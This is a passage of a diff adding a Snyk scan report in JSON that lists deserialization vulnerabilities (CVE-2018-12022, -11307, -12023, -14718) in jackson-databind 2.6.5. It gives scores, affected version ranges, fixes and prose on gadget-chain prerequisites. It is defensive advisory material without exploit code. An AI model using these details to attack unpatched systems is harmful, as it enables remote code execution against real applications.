"com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": 
"3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + 
"severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + 